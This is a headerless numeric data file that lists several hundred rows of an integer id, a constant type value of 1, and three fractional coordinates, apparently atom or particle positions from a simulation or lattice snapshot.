487 1 0.190331 0.371155 0.439157
614 1 0.183885 0.438609 0.498256
618 1 0.316014 0.433347 0.484262
621 1 0.372627 0.3724 0.497651
493 1 0.383378 0.375253 0.372097
497 1 0.495735 0.373691 0.38187
495 1 0.44011 0.36954 0.433977
494 1 0.442609 0.436531 0.37838
496 1 0.383347 0.442892 0.436895
625 1 0.497939 0.373702 0.499305
622 1 0.43304 0.429084 0.496445
500 1 0.504724 0.436732 0.434012
498 1 0.564148 0.445574 0.374327
501 1 0.628375 0.373421 0.375721
499 1 0.560876 0.375579 0.4411
504 1 0.629138 0.435543 0.437651
1427 1 0.567187 0.495566 0.441552
626 1 0.570155 0.434641 0.496437
503 1 0.68564 0.37307 0.441296
502 1 0.692414 0.428278 0.375312
505 1 0.747178 0.372143 0.382875
508 1 0.755072 0.438569 0.441064
506 1 0.814096 0.446775 0.371958
507 1 0.812354 0.383609 0.435667
1431 1 0.687781 0.491296 0.435966
634 1 0.815141 0.444945 0.4955
1433 1 0.744385 0.498243 0.373916
481 1 0.997047 0.374586 0.376238
1409 1 0.99439 0.493779 0.382113
512 1 0.879944 0.436258 0.44217
511 1 0.934131 0.376557 0.442888
510 1 0.939314 0.43681 0.377536
509 1 0.872807 0.380066 0.3705
484 1 0.990854 0.434178 0.445828
520 1 0.132482 0.056368 0.567599
547 1 0.071341 0.118291 0.557594
642 1 0.0639421 0.0590157 0.618476
677 1 0.120767 0.120947 0.620026
673 1 0.00928493 0.118228 0.618831
549 1 0.129357 0.108455 0.501716
514 1 0.0606581 0.0576103 0.502378
641 1 0.00390032 0.000386603 0.618468
524 1 0.25138 0.0595999 0.563012
551 1 0.189389 0.128261 0.558067
555 1 0.311577 0.120246 0.563421
646 1 0.199596 0.0615075 0.62415
650 1 0.30853 0.0569248 0.616628
681 1 0.242778 0.128274 0.619754
522 1 0.308078 0.0641344 0.50413
553 1 0.250453 0.122139 0.504919
528 1 0.373923 0.0580183 0.562554
559 1 0.436285 0.128057 0.567539
654 1 0.434464 0.0581554 0.628362
685 1 0.376234 0.12335 0.624459
532 1 0.492372 0.0576537 0.567989
557 1 0.375399 0.123509 0.507263
526 1 0.434199 0.0647741 0.505771
689 1 0.505234 0.119591 0.624169
536 1 0.625574 0.0654157 0.564643
563 1 0.560882 0.124958 0.566258
658 1 0.564378 0.0526167 0.6352
693 1 0.620881 0.125838 0.625667
661 1 0.630164 0.00432539 0.618959
531 1 0.564625 0.000641042 0.566246
530 1 0.562806 0.0624388 0.504075
561 1 0.503837 0.115487 0.507806
540 1 0.764578 0.0697048 0.558381
567 1 0.697633 0.12637 0.56686
571 1 0.818794 0.128966 0.561506
662 1 0.692404 0.0604863 0.618962
666 1 0.811552 0.0650363 0.62531
697 1 0.755682 0.130289 0.626598
539 1 0.811378 0.00198473 0.564049
534 1 0.696217 0.0690999 0.509214
538 1 0.815356 0.0628043 0.503181
516 1 0.996026 0.0635124 0.561896
544 1 0.87277 0.0569664 0.560937
575 1 0.942122 0.122931 0.557163
670 1 0.937802 0.0649534 0.627623
701 1 0.877259 0.122896 0.623291
669 1 0.87724 0.00595232 0.632447
542 1 0.933977 0.0610287 0.50089
545 1 0.99922 0.12351 0.502583
552 1 0.123382 0.179836 0.560693
579 1 0.0549391 0.249495 0.564604
584 1 0.119182 0.309567 0.562076
674 1 0.0630856 0.188664 0.62423
706 1 0.0587391 0.307644 0.632963
709 1 0.118698 0.250905 0.632382
546 1 0.0583156 0.188455 0.505324
548 1 0.00196756 0.186885 0.562425
581 1 0.125719 0.243896 0.503333
577 1 0.00211722 0.252193 0.501316
556 1 0.252907 0.184089 0.561511
583 1 0.178328 0.243964 0.564208
587 1 0.307677 0.244391 0.564534
588 1 0.248035 0.316658 0.558609
678 1 0.177605 0.187232 0.621663
682 1 0.3083 0.183021 0.620478
710 1 0.179472 0.319183 0.620958
713 1 0.247173 0.247915 0.61462
714 1 0.315179 0.313143 0.618755
550 1 0.188996 0.187693 0.503548
582 1 0.178631 0.319056 0.502421
560 1 0.372241 0.183126 0.562002
591 1 0.439857 0.247456 0.559834
592 1 0.368014 0.314231 0.555691
686 1 0.438044 0.194053 0.621975
717 1 0.366778 0.242384 0.617639
718 1 0.429128 0.308821 0.616883
564 1 0.498269 0.187286 0.561255
589 1 0.366949 0.244998 0.502101
597 1 0.632653 0.258114 0.503969
596 1 0.50216 0.316501 0.557816
721 1 0.501131 0.251153 0.621794
568 1 0.62651 0.187484 0.566356
595 1 0.568106 0.25667 0.558005
600 1 0.630321 0.314333 0.567664
690 1 0.562565 0.192933 0.63089
722 1 0.555978 0.316641 0.626321
725 1 0.622161 0.250843 0.626002
562 1 0.566745 0.186899 0.505129
593 1 0.504731 0.246932 0.500378
566 1 0.68617 0.194159 0.507507
598 1 0.69136 0.318972 0.505415
572 1 0.754183 0.19045 0.563445
599 1 0.68817 0.254251 0.568889
603 1 0.810959 0.258746 0.567872
604 1 0.747655 0.313936 0.565451
694 1 0.687222 0.179485 0.624728
698 1 0.811415 0.197592 0.626582
726 1 0.693989 0.316558 0.632612
729 1 0.746441 0.252035 0.628461
730 1 0.811543 0.31721 0.629391
570 1 0.810517 0.195477 0.503345
602 1 0.816186 0.313732 0.502867
601 1 0.747997 0.257038 0.506109
705 1 0.995392 0.248578 0.62238
580 1 0.999885 0.313103 0.561486
576 1 0.877128 0.190332 0.56383
607 1 0.945047 0.253742 0.564145
608 1 0.887607 0.316513 0.565135
702 1 0.943052 0.179133 0.619518
733 1 0.88536 0.257348 0.621749
734 1 0.936526 0.315971 0.629526
605 1 0.872407 0.251276 0.503077
606 1 0.942238 0.306094 0.503111
1541 1 0.124039 0.496917 0.501833
611 1 0.0583257 0.370699 0.564345
616 1 0.126191 0.441022 0.557561
738 1 0.0622368 0.442388 0.630611
741 1 0.116889 0.375147 0.627585
610 1 0.0646782 0.436537 0.507656
1547 1 0.316033 0.49751 0.562502
1545 1 0.254697 0.497237 0.502756
615 1 0.188206 0.379853 0.564208
619 1 0.310142 0.376213 0.567693
620 1 0.255298 0.434379 0.561729
742 1 0.179733 0.43427 0.624703
745 1 0.250687 0.381134 0.621385
746 1 0.309682 0.441325 0.633992
1551 1 0.440367 0.488348 0.558494
623 1 0.44146 0.369674 0.558723
624 1 0.369632 0.430302 0.567591
749 1 0.379423 0.366315 0.62758
750 1 0.440848 0.435179 0.626056
753 1 0.497386 0.374858 0.619552
1549 1 0.381859 0.499121 0.501535
1677 1 0.376847 0.489747 0.626038
1685 1 0.613752 0.499158 0.632723
628 1 0.500509 0.436401 0.567535
627 1 0.563826 0.375209 0.561513
632 1 0.620634 0.433046 0.565807
754 1 0.557046 0.434693 0.633606
757 1 0.618946 0.37912 0.629962
1555 1 0.553314 0.498264 0.575869
1553 1 0.507024 0.493564 0.506305
1557 1 0.62575 0.495738 0.513247
629 1 0.629331 0.371671 0.506681
631 1 0.689504 0.379675 0.572694
635 1 0.810213 0.373842 0.565441
636 1 0.752874 0.437738 0.562063
758 1 0.674584 0.442161 0.626577
761 1 0.745941 0.38189 0.62817
762 1 0.810054 0.430806 0.622838
1559 1 0.690099 0.499345 0.56465
633 1 0.751519 0.377224 0.504097
1561 1 0.750893 0.498819 0.505447
630 1 0.684609 0.436676 0.501766
609 1 0.995034 0.376015 0.50706
737 1 0.997707 0.379018 0.634066
612 1 0.993757 0.438554 0.571105
639 1 0.935103 0.381943 0.569422
640 1 0.867752 0.439414 0.563665
765 1 0.874936 0.378194 0.623276
766 1 0.93425 0.440362 0.631145
637 1 0.87002 0.380834 0.507667
638 1 0.930018 0.436579 0.502554
643 1 0.0654935 0.00510844 0.678605
773 1 0.123847 0.00868498 0.752024
648 1 0.132781 0.0622276 0.677449
675 1 0.0651296 0.115879 0.686133
770 1 0.0607574 0.0600819 0.746825
776 1 0.121566 0.0606807 0.815977
803 1 0.0650735 0.130197 0.806
805 1 0.126864 0.119568 0.745938
772 1 0.00531154 0.0645393 0.811635
652 1 0.250868 0.0651833 0.694998
679 1 0.193725 0.116039 0.68423
683 1 0.312087 0.118134 0.676875
774 1 0.192439 0.0592989 0.750766
778 1 0.31397 0.0664772 0.749962
780 1 0.245111 0.0557268 0.810522
807 1 0.185434 0.121681 0.812034
809 1 0.24968 0.12676 0.746731
811 1 0.299526 0.115861 0.811181
775 1 0.180097 0.0053913 0.820043
656 1 0.368644 0.055332 0.684148
687 1 0.438836 0.129767 0.686854
782 1 0.436124 0.0726336 0.748047
784 1 0.364022 0.057688 0.806643
813 1 0.36654 0.117435 0.745043
815 1 0.436212 0.135468 0.801063
660 1 0.494369 0.0615541 0.681535
788 1 0.495001 0.069678 0.798511
783 1 0.434702 0.00210318 0.807104
789 1 0.627961 0.008086 0.754316
787 1 0.560549 0.00540985 0.815863
817 1 0.500518 0.130181 0.746166
664 1 0.630862 0.0610571 0.689599
691 1 0.563308 0.126436 0.685856
786 1 0.561355 0.0702487 0.749482
792 1 0.623475 0.0667451 0.814124
819 1 0.554524 0.129899 0.813432
821 1 0.627088 0.126611 0.753559
793 1 0.755324 0.00146496 0.750426
791 1 0.690745 0.0032831 0.814177
668 1 0.743744 0.0692725 0.68451
695 1 0.674656 0.130546 0.690206
699 1 0.807763 0.125826 0.684891
790 1 0.695393 0.06685 0.751011
794 1 0.813101 0.0721961 0.760031
796 1 0.755597 0.0601523 0.810878
823 1 0.687631 0.123056 0.806698
825 1 0.747246 0.129825 0.75067
827 1 0.814041 0.12924 0.821644
667 1 0.813049 0.00455409 0.690862
663 1 0.691036 0.0017942 0.683721
799 1 0.938433 0.00199386 0.811744
644 1 0.999889 0.0651257 0.680902
797 1 0.876195 0.0027061 0.746412
801 1 0.999624 0.125968 0.745551
672 1 0.866917 0.0704702 0.695819
703 1 0.939225 0.133525 0.6865
798 1 0.941107 0.0636447 0.750567
800 1 0.878959 0.0612945 0.810759
829 1 0.878543 0.133138 0.750409
831 1 0.947115 0.128634 0.817372
671 1 0.936513 0.00195513 0.686559
707 1 0.0567452 0.248598 0.689017
680 1 0.122937 0.185624 0.689622
712 1 0.123162 0.311729 0.691704
802 1 0.0695885 0.19251 0.750192
808 1 0.133884 0.184693 0.805449
834 1 0.0641591 0.31576 0.757684
835 1 0.0635511 0.251371 0.814009
837 1 0.126435 0.253905 0.74794
840 1 0.128036 0.316702 0.814438
836 1 0.000639547 0.309102 0.813216
676 1 0.00268381 0.18402 0.690894
804 1 0.00164552 0.184861 0.808198
684 1 0.243197 0.191789 0.6813
711 1 0.182258 0.253506 0.6772
715 1 0.30871 0.260312 0.679244
716 1 0.235495 0.317081 0.674815
806 1 0.189299 0.186615 0.745976
810 1 0.302744 0.186836 0.74181
812 1 0.246652 0.18206 0.808054
838 1 0.190376 0.311499 0.755955
839 1 0.190261 0.246346 0.806219
841 1 0.244945 0.250858 0.742392
842 1 0.301467 0.310569 0.745331
843 1 0.302684 0.250335 0.812656
844 1 0.251458 0.311519 0.814651
688 1 0.373627 0.185534 0.683486
719 1 0.424117 0.256062 0.682183
720 1 0.366802 0.316031 0.693674
814 1 0.42883 0.185742 0.740604
816 1 0.361828 0.184847 0.81001
845 1 0.364855 0.247258 0.749175
846 1 0.427591 0.307711 0.754493
847 1 0.427621 0.246682 0.809567
848 1 0.362402 0.313782 0.807214
692 1 0.492697 0.199556 0.680468
820 1 0.497495 0.184286 0.812129
724 1 0.486976 0.305186 0.683221
849 1 0.501108 0.248168 0.752954
852 1 0.500979 0.309542 0.815048
696 1 0.617485 0.200218 0.68941
723 1 0.552288 0.256883 0.694884
728 1 0.625372 0.319453 0.685955
818 1 0.569516 0.185711 0.751344
824 1 0.627585 0.184865 0.822775
850 1 0.563434 0.30781 0.758464
851 1 0.557167 0.241495 0.822429
853 1 0.623929 0.255181 0.759316
856 1 0.628589 0.323673 0.81331
700 1 0.744682 0.187628 0.684949
727 1 0.68346 0.252739 0.692315
731 1 0.815175 0.255491 0.69226
732 1 0.751456 0.319781 0.693443
822 1 0.687066 0.190573 0.745839
826 1 0.803111 0.189799 0.743831
828 1 0.743736 0.189489 0.812922
854 1 0.695406 0.319635 0.755151
855 1 0.687462 0.248887 0.815172
857 1 0.746936 0.254446 0.753419
858 1 0.807485 0.316472 0.744502
859 1 0.821163 0.247643 0.811978
860 1 0.751906 0.317285 0.814434
708 1 0.998732 0.317619 0.696324
833 1 0.994911 0.248358 0.744842
704 1 0.869949 0.186584 0.682823
735 1 0.936199 0.246848 0.68608
736 1 0.878651 0.320177 0.685767
830 1 0.932131 0.190985 0.756269
832 1 0.878361 0.191364 0.821104
861 1 0.873528 0.24938 0.752941
862 1 0.935368 0.317579 0.757322
863 1 0.933071 0.251271 0.818414
864 1 0.872532 0.323961 0.815274
1797 1 0.119819 0.495765 0.749979
739 1 0.0557871 0.376562 0.696521
744 1 0.117949 0.441948 0.686819
866 1 0.0613815 0.438576 0.756331
867 1 0.0628723 0.370227 0.82298
869 1 0.132396 0.375497 0.75301
872 1 0.117499 0.440129 0.815094
1795 1 0.0590278 0.495924 0.821515
1801 1 0.254104 0.498527 0.763374
1671 1 0.186614 0.497783 0.687088
1803 1 0.315553 0.491356 0.818512
743 1 0.180321 0.37717 0.680092
747 1 0.304786 0.375852 0.69046
748 1 0.2383 0.433113 0.68472
870 1 0.181253 0.43863 0.750149
871 1 0.177135 0.382205 0.817079
873 1 0.237605 0.375871 0.754876
874 1 0.302595 0.432506 0.75101
875 1 0.303816 0.381996 0.81484
876 1 0.244151 0.436813 0.818081
1675 1 0.302741 0.493843 0.69488
1805 1 0.374363 0.499774 0.753094
751 1 0.434987 0.368721 0.695488
752 1 0.364937 0.436383 0.689937
877 1 0.367733 0.37635 0.754262
878 1 0.433026 0.434524 0.750872
879 1 0.441409 0.374049 0.810592
880 1 0.375868 0.441449 0.814873
756 1 0.497775 0.438367 0.69702
1807 1 0.441531 0.498731 0.811072
1809 1 0.498251 0.499382 0.749514
1679 1 0.438488 0.499836 0.696106
1683 1 0.561115 0.499278 0.697419
881 1 0.500171 0.363111 0.756621
884 1 0.500866 0.433355 0.807968
755 1 0.558252 0.369765 0.698138
760 1 0.621461 0.433296 0.692645
882 1 0.562465 0.438846 0.7568
883 1 0.567935 0.374283 0.816354
885 1 0.621531 0.373604 0.749323
888 1 0.629088 0.434371 0.815309
1813 1 0.626462 0.495017 0.758068
1815 1 0.688872 0.499893 0.81742
759 1 0.684132 0.380503 0.686143
763 1 0.816036 0.375035 0.69015
764 1 0.754122 0.446274 0.686556
886 1 0.695129 0.43908 0.748738
887 1 0.692105 0.376315 0.810285
889 1 0.756756 0.381363 0.747136
890 1 0.815592 0.444683 0.750149
891 1 0.814312 0.377616 0.812338
892 1 0.75675 0.439796 0.817781
1823 1 0.926352 0.498269 0.813468
865 1 0.998336 0.373242 0.757999
868 1 0.994865 0.436142 0.810721
740 1 0.996874 0.431382 0.698683
1695 1 0.937526 0.49618 0.691932
767 1 0.941544 0.37358 0.697815
768 1 0.868801 0.448728 0.68437
893 1 0.877606 0.382124 0.748619
894 1 0.927437 0.442764 0.750656
895 1 0.928803 0.382487 0.817631
896 1 0.865849 0.442888 0.817803
1793 1 0.992715 0.49394 0.750044
899 1 0.0612795 0.0050437 0.93913
901 1 0.122834 0.00619409 0.881508
898 1 0.0555217 0.0627826 0.88011
904 1 0.127045 0.0695294 0.942327
931 1 0.0675366 0.130796 0.943739
933 1 0.121583 0.121467 0.885682
900 1 0.000239848 0.0672502 0.943459
929 1 0.00657832 0.129185 0.874615
5 1 0.124175 0.00932353 0.999299
903 1 0.185749 0.00762248 0.944161
10 1 0.318646 0.0613694 0.996619
902 1 0.182632 0.072281 0.874397
906 1 0.306477 0.0550451 0.865734
908 1 0.255825 0.056344 0.939216
935 1 0.191646 0.128303 0.937916
937 1 0.252892 0.127557 0.873589
939 1 0.316603 0.121751 0.930763
913 1 0.49337 0.00747771 0.87778
909 1 0.371146 0.00202364 0.876048
910 1 0.425591 0.0642587 0.868861
912 1 0.37055 0.0631489 0.933092
941 1 0.370474 0.130808 0.866748
943 1 0.436461 0.12817 0.931482
916 1 0.493539 0.0632454 0.941896
945 1 0.494719 0.123936 0.879313
911 1 0.436892 0.00249549 0.937036
45 1 0.372443 0.132167 0.986635
915 1 0.555217 0.000179435 0.936282
18 1 0.566157 0.0574414 0.999473
914 1 0.554772 0.0631903 0.879396
920 1 0.622796 0.0520015 0.936866
947 1 0.557753 0.112002 0.942524
949 1 0.618704 0.121559 0.881963
53 1 0.621488 0.12342 0.999314
923 1 0.81448 0.00346725 0.943919
918 1 0.689557 0.067372 0.873443
922 1 0.806945 0.0559852 0.881171
924 1 0.750383 0.0641593 0.938431
951 1 0.684907 0.111254 0.948361
953 1 0.748408 0.120975 0.869739
955 1 0.818732 0.115409 0.941632
897 1 0.99564 0.000667212 0.874335
925 1 0.882378 0.0030247 0.877454
926 1 0.945754 0.0665551 0.876951
928 1 0.881867 0.0599224 0.938075
957 1 0.880393 0.12767 0.875955
959 1 0.934487 0.127987 0.94782
930 1 0.0691058 0.193806 0.876275
936 1 0.12738 0.193739 0.941599
962 1 0.0612751 0.309793 0.877416
963 1 0.0657896 0.251527 0.940751
965 1 0.135118 0.250128 0.872485
968 1 0.133897 0.309368 0.934351
961 1 0.000968458 0.246137 0.880344
964 1 0.0005994 0.310432 0.941728
65 1 0.00625446 0.249008 0.999912
66 1 0.060373 0.311345 0.998664
42 1 0.312157 0.187783 0.995361
934 1 0.188828 0.183102 0.869915
938 1 0.305607 0.19726 0.876845
940 1 0.250092 0.19753 0.93661
966 1 0.187973 0.311414 0.868865
967 1 0.19433 0.255331 0.933841
969 1 0.243571 0.250497 0.871267
970 1 0.307712 0.312554 0.876334
971 1 0.312475 0.25396 0.946099
972 1 0.248611 0.312668 0.938412
70 1 0.184843 0.31044 0.997095
38 1 0.19642 0.181047 0.999136
78 1 0.437051 0.309789 0.997555
973 1 0.364853 0.25026 0.871449
944 1 0.375552 0.190308 0.927104
942 1 0.434757 0.185244 0.87061
976 1 0.368445 0.313169 0.933939
975 1 0.431901 0.249903 0.930762
974 1 0.428396 0.309201 0.876241
980 1 0.496028 0.30875 0.92984
948 1 0.499708 0.182457 0.939856
977 1 0.490724 0.246779 0.871567
77 1 0.372748 0.247825 0.997365
46 1 0.437888 0.193998 0.993139
81 1 0.503062 0.251655 0.997471
50 1 0.575688 0.189328 0.995369
85 1 0.632944 0.249769 0.995987
979 1 0.55524 0.246817 0.930807
981 1 0.62727 0.245657 0.880664
978 1 0.567346 0.30684 0.867227
984 1 0.624846 0.30791 0.936352
946 1 0.556056 0.183486 0.878612
952 1 0.637268 0.185947 0.935206
82 1 0.566391 0.305975 0.995522
86 1 0.684082 0.315988 0.995014
983 1 0.690242 0.246219 0.93294
954 1 0.80881 0.179819 0.88401
982 1 0.68289 0.313519 0.881353
986 1 0.816286 0.319758 0.881813
988 1 0.748055 0.311906 0.934952
950 1 0.689995 0.183515 0.87065
985 1 0.750251 0.245582 0.877467
987 1 0.812794 0.253733 0.939021
956 1 0.741299 0.175413 0.945861
89 1 0.745369 0.256281 0.99555
90 1 0.807598 0.315304 0.996842
932 1 0.999088 0.184568 0.937798
960 1 0.875951 0.189843 0.930117
991 1 0.940705 0.254942 0.941136
958 1 0.939258 0.194667 0.877338
992 1 0.879362 0.308598 0.946532
989 1 0.874271 0.26029 0.878486
990 1 0.944903 0.319625 0.877512
1923 1 0.0629493 0.498388 0.949693
995 1 0.0643745 0.367894 0.937658
1000 1 0.123494 0.435176 0.944016
997 1 0.123709 0.37618 0.885466
994 1 0.0522784 0.437886 0.882706
98 1 0.060169 0.431699 0.999102
1931 1 0.310373 0.499541 0.942233
1002 1 0.319497 0.435279 0.880218
1003 1 0.307242 0.377449 0.942893
1001 1 0.246309 0.382931 0.876187
998 1 0.173894 0.437356 0.877726
1004 1 0.249458 0.440587 0.941329
999 1 0.191593 0.378553 0.941222
1935 1 0.44196 0.491107 0.931039
1008 1 0.376621 0.437559 0.942794
1005 1 0.376253 0.376141 0.868145
110 1 0.435379 0.439735 0.999144
1006 1 0.434894 0.43876 0.866698
1007 1 0.432921 0.376281 0.928174
109 1 0.379448 0.370589 0.993874
1013 1 0.625886 0.377723 0.875556
1009 1 0.504922 0.373442 0.876519
1012 1 0.504505 0.438053 0.929542
1010 1 0.562949 0.441458 0.872225
1011 1 0.564553 0.37875 0.940062
1016 1 0.617203 0.438811 0.931463
1045 1 0.620271 0.498017 0.992266
121 1 0.740964 0.378555 0.996591
118 1 0.676781 0.433312 0.998123
122 1 0.812088 0.440898 0.998616
1017 1 0.747302 0.377329 0.877122
1015 1 0.681871 0.380474 0.937883
1018 1 0.806437 0.437115 0.87789
1020 1 0.744073 0.444109 0.947695
1014 1 0.688398 0.450115 0.88317
1019 1 0.810499 0.379521 0.947365
1947 1 0.820099 0.499061 0.935386
1024 1 0.88645 0.444743 0.940644
1023 1 0.939616 0.379793 0.945378
1022 1 0.936705 0.440042 0.874711
1021 1 0.877186 0.376375 0.889309
1921 1 0.994599 0.498257 0.874248
996 1 0.996757 0.445371 0.942683
993 1 0.996594 0.380287 0.878188
125 1 0.872365 0.379008 0.999838
1032 1 0.123337 0.560573 0.0693952
1059 1 0.0548818 0.624202 0.0654376
1154 1 0.0585238 0.558605 0.12532
1189 1 0.119351 0.629147 0.117175
1061 1 0.123379 0.624243 0.00540681
1029 1 0.134463 0.501693 0.00449949
1026 1 0.0559648 0.565729 0.009638
1036 1 0.250205 0.563731 0.0630249
1063 1 0.185957 0.619091 0.0628658
1067 1 0.307039 0.629187 0.0689701
1158 1 0.191133 0.558362 0.123051
1162 1 0.313135 0.565336 0.122048
1193 1 0.24994 0.627089 0.123658
1161 1 0.256975 0.505698 0.129468
1065 1 0.253662 0.624555 0.00137982
1030 1 0.18577 0.567409 0.00300649
1035 1 0.317182 0.500085 0.066397
1034 1 0.31109 0.554253 0.00710569
1033 1 0.242567 0.504977 0.0047797
1040 1 0.381745 0.555144 0.0614741
1071 1 0.435204 0.624965 0.0560759
1166 1 0.437069 0.558318 0.120723
1197 1 0.379136 0.627755 0.118923
1044 1 0.497001 0.558807 0.061636
1069 1 0.368525 0.617787 0.00365692
1038 1 0.4418 0.561101 0.00529595
1201 1 0.500693 0.624859 0.123562
1048 1 0.626564 0.565937 0.0585019
1075 1 0.563995 0.627535 0.0597615
1170 1 0.558846 0.561432 0.121288
1205 1 0.622577 0.635273 0.115532
1173 1 0.620589 0.503645 0.118793
1046 1 0.691165 0.559063 0.00376413
1052 1 0.754942 0.568985 0.0640089
1079 1 0.693955 0.625543 0.0581288
1083 1 0.816361 0.628913 0.0642424
1174 1 0.682121 0.560094 0.118394
1178 1 0.816008 0.57044 0.125643
1209 1 0.755295 0.630581 0.124361
1050 1 0.822138 0.567503 0.00767455
1049 1 0.757514 0.506516 0.000234039
1051 1 0.81748 0.503434 0.0642058
1028 1 0.988746 0.565196 0.0660308
1185 1 0.99394 0.620864 0.124848
1056 1 0.877103 0.559194 0.0600475
1087 1 0.934302 0.631304 0.0579823
1182 1 0.930649 0.562194 0.125349
1213 1 0.875025 0.620688 0.114715
1085 1 0.880228 0.629998 0.00311791
1025 1 0.992823 0.503793 0.00186612
1054 1 0.937423 0.565909 0.00549838
1057 1 0.994527 0.625972 0.00277323
1090 1 0.0647806 0.817089 0.00684543
1064 1 0.125945 0.688864 0.0629464
1091 1 0.0629295 0.752662 0.0743194
1096 1 0.118986 0.816714 0.0675398
1186 1 0.0604977 0.685292 0.122167
1218 1 0.0586507 0.816509 0.1247
1221 1 0.126137 0.742291 0.124969
1217 1 0.00392153 0.755838 0.127758
1092 1 0.00128865 0.818743 0.0616656
1093 1 0.122084 0.748164 0.00498665
1089 1 0.00847242 0.75096 0.00647201
1068 1 0.250774 0.68441 0.0592011
1095 1 0.187939 0.74992 0.0618228
1099 1 0.317774 0.750041 0.0519665
1100 1 0.255952 0.807776 0.0604752
1190 1 0.190856 0.690892 0.119849
1194 1 0.314123 0.684161 0.130358
1222 1 0.188209 0.812017 0.12775
1225 1 0.249998 0.750498 0.120827
1226 1 0.321948 0.817074 0.128608
1062 1 0.184251 0.687674 0.00291969
1072 1 0.36816 0.683176 0.0606539
1103 1 0.439643 0.743757 0.0644488
1104 1 0.383221 0.810068 0.061197
1198 1 0.443413 0.682231 0.118436
1229 1 0.375144 0.749471 0.118775
1230 1 0.447237 0.809305 0.122678
1108 1 0.496283 0.808364 0.0590627
1102 1 0.436705 0.809285 0.00175194
1233 1 0.502945 0.746539 0.119987
1076 1 0.502189 0.68263 0.0557975
1080 1 0.623132 0.694751 0.060107
1107 1 0.562579 0.750535 0.0553849
1112 1 0.63305 0.810515 0.0524618
1202 1 0.565281 0.695815 0.118993
1234 1 0.560725 0.815786 0.119899
1237 1 0.625272 0.762301 0.119921
1084 1 0.755246 0.685803 0.0590482
1111 1 0.694456 0.753428 0.0593082
1115 1 0.815872 0.7506 0.066954
1116 1 0.753734 0.810691 0.0594453
1206 1 0.690584 0.685912 0.117782
1210 1 0.818246 0.689925 0.121913
1238 1 0.688487 0.814942 0.123439
1241 1 0.748962 0.75308 0.121402
1242 1 0.820529 0.819188 0.119622
1082 1 0.817592 0.690674 0.00643256
1113 1 0.760993 0.748965 0.000950661
1078 1 0.684794 0.682301 0.00119638
1086 1 0.93881 0.694332 0.00638842
1060 1 0.997063 0.690469 0.0618444
1117 1 0.878951 0.750338 0.00249407
1088 1 0.879684 0.688094 0.0655788
1119 1 0.943897 0.749302 0.0646652
1120 1 0.879587 0.814392 0.0644169
1214 1 0.936081 0.676247 0.129615
1245 1 0.882225 0.751399 0.121672
1246 1 0.947709 0.816244 0.117453
1118 1 0.940068 0.812634 0.00438242
1123 1 0.0677413 0.878388 0.0655694
1128 1 0.125563 0.955178 0.057296
1250 1 0.0679797 0.940717 0.12179
1253 1 0.127527 0.876221 0.124827
1249 1 0.00150694 0.875059 0.127521
1124 1 0.00854869 0.941952 0.0641185
1125 1 0.129905 0.875415 0.00513504
1127 1 0.18624 0.875684 0.069364
1131 1 0.309683 0.871316 0.0538618
1132 1 0.250094 0.936736 0.0573411
1254 1 0.188725 0.940444 0.117676
1257 1 0.255306 0.869266 0.128162
1258 1 0.314723 0.937474 0.118079
11 1 0.316806 0.999613 0.0581834
1126 1 0.186984 0.942793 0.008099
1130 1 0.316275 0.93743 0.000744087
1135 1 0.438513 0.881371 0.0595115
1136 1 0.376366 0.935899 0.06036
1261 1 0.381772 0.875393 0.116078
1262 1 0.438994 0.937151 0.11687
1140 1 0.49879 0.938957 0.0653509
141 1 0.377434 0.993892 0.123186
1137 1 0.496306 0.87282 0.00644141
1265 1 0.505732 0.883797 0.129153
1139 1 0.567206 0.878607 0.0609333
1144 1 0.622589 0.935601 0.0677653
1266 1 0.563319 0.946433 0.125065
1269 1 0.625858 0.870015 0.128669
21 1 0.614138 0.995617 0.00961819
1141 1 0.622847 0.877817 0.0020733
23 1 0.676844 0.998508 0.0640805
153 1 0.748202 0.9955 0.129274
1143 1 0.695188 0.875476 0.0573997
1147 1 0.817315 0.880493 0.0615676
1148 1 0.746437 0.942606 0.0583016
1270 1 0.683664 0.937222 0.129664
1273 1 0.753847 0.872635 0.118503
1274 1 0.809046 0.936992 0.125758
27 1 0.819132 0.997511 0.0685613
31 1 0.940555 0.996699 0.0665835
1151 1 0.947481 0.88064 0.0694714
1152 1 0.881046 0.933152 0.068424
1277 1 0.877047 0.880449 0.13084
1278 1 0.937095 0.942219 0.128505
157 1 0.877427 0.99894 0.126564
1283 1 0.062645 0.507792 0.312086
1281 1 0.00119332 0.500831 0.252934
1160 1 0.125633 0.571902 0.177126
1187 1 0.062069 0.620007 0.178533
1282 1 0.067425 0.564089 0.247112
1288 1 0.127493 0.56189 0.310566
1315 1 0.0628223 0.625265 0.309546
1317 1 0.121509 0.625784 0.248347
1156 1 0.00129715 0.562967 0.189192
1155 1 0.0727329 0.507684 0.189997
1291 1 0.310965 0.505053 0.314607
1159 1 0.18801 0.504046 0.190245
1164 1 0.248402 0.566876 0.191218
1191 1 0.184548 0.626177 0.176827
1195 1 0.310226 0.621098 0.188592
1286 1 0.18882 0.56143 0.247181
1290 1 0.306301 0.555207 0.248351
1292 1 0.250118 0.569428 0.315245
1319 1 0.182921 0.623097 0.31689
1321 1 0.243073 0.628021 0.245438
1323 1 0.310669 0.631173 0.312782
1293 1 0.376398 0.501478 0.250292
1168 1 0.374456 0.557056 0.183423
1199 1 0.431745 0.619663 0.180828
1294 1 0.429403 0.565352 0.246034
1296 1 0.378594 0.566707 0.311529
1325 1 0.368455 0.618721 0.246048
1327 1 0.442721 0.623158 0.315511
1300 1 0.496183 0.556978 0.308737
1329 1 0.500988 0.618486 0.249717
1172 1 0.501155 0.566548 0.182292
1176 1 0.631566 0.567055 0.17925
1203 1 0.567414 0.622867 0.183454
1298 1 0.565781 0.561374 0.243871
1304 1 0.623582 0.562956 0.313042
1331 1 0.5585 0.627329 0.304127
1333 1 0.630399 0.624742 0.244752
1297 1 0.504477 0.500712 0.243518
1299 1 0.564996 0.504687 0.312796
1301 1 0.63012 0.503788 0.249582
1180 1 0.748115 0.561939 0.174537
1207 1 0.695007 0.629948 0.180143
1211 1 0.808476 0.625184 0.188917
1302 1 0.694001 0.559756 0.24344
1306 1 0.804969 0.559161 0.24614
1308 1 0.749068 0.566021 0.305594
1335 1 0.6888 0.629895 0.300414
1337 1 0.750272 0.624721 0.243703
1339 1 0.809607 0.624482 0.310355
1309 1 0.874782 0.500318 0.247434
1284 1 0.999815 0.558539 0.316464
1313 1 0.999068 0.623475 0.253647
1184 1 0.872906 0.562584 0.188929
1215 1 0.934197 0.621704 0.191057
1310 1 0.937004 0.557836 0.246734
1312 1 0.869935 0.558739 0.306619
1341 1 0.866283 0.625832 0.248973
